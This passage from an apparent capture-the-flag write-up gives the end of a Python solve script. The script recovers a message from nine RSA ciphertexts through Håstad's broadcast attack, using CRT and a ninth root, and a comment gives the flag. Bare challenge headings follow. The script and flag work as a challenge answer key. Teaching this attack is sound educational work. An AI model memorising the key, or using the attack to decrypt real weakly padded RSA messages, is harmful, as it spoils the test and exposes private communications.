c = [62580922178008480377006528793506649089253164524883696044759651305970802215270721223149734532870729533611357047595181907404222690394917605617029675103788705320032707977225447998111744887898039756375876685711148857676502670812333076878964148863713993853526715855758799502735753454247721711366497722251078739585, 46186240819076690248235492196228128599822002268014359444368898414937734806009161030424589993541799877081745454934484263188270879142125136786221625234555265815513136730416539407710862948861531339065039071959576035606192732936477944770308784472646015244527805057990939765708793705044236665364664490419874206900, 85756449024868529058704599481168414715291172247059370174556127800630896693021701121075838517372920466708826412897794900729896389468152213884232173410022054605870785910461728567377769960823103334874807744107855490558726013068890632637193410610478514663078901021307258078678427928255699031215654693270240640198, 14388767329946097216670270960679686032536707277732968784379505904021622612991917314721678940833050736745004078559116326396233622519356703639737886289595860359630019239654690312132039876082685046329079266785042428947147658321799501605837784127004536996628492065409017175037161261039765340032473048737319069656, 1143736792108232890306863524988028098730927600066491485326214420279375304665896453544100447027809433141790331191324806205845009336228331138326163746853197990596700523328423791764843694671580875538251166864957646807184041817863314204516355683663859246677105132100377322669627893863885482167305919925159944839, 2978800921927631161807562509445310353414810029862911925227583943849942080514132963605492727604495513988707849133045851539412276254555228149742924149242124724864770049898278052042163392380895275970574317984638058768854065506927848951716677514095183559625442889028813635385408810698294574175092159389388091981, 16200944263352278316040095503540249310705602580329203494665614035841657418101517016718103326928336623132935178377208651067093136976383774189554806135146237406248538919915426183225265103769259990252162411307338473817114996409705345401251435268136647166395894099897737607312110866874944619080871831772376466376, 31551601425575677138046998360378916515711528548963089502535903329268089950335615563205720969393649713416910860593823506545030969355111753902391336139384464585775439245735448030993755229554555004154084649002801255396359097917380427525820249562148313977941413268787799534165652742114031759562268691233834820996, 25288164985739570635307839193110091356864302148147148153228604718807817833935053919412276187989509493755136905193728864674684139319708358686431424793278248263545370628718355096523088238513079652226028236137381367215156975121794485995030822902933639803569133458328681148758392333073624280222354763268512333515]
m9=exCRT(c,n)
m=gmpy2.iroot(m9,9)[0]
print(long_to_bytes(m))
#flag{H0w_Fun_13_HAstads_broadca5t_AtTack!}

mobile

AreYouRich

designEachStep


rev

petition

Locke

pwn

littleof

babyof

onecho

easycho

pwn1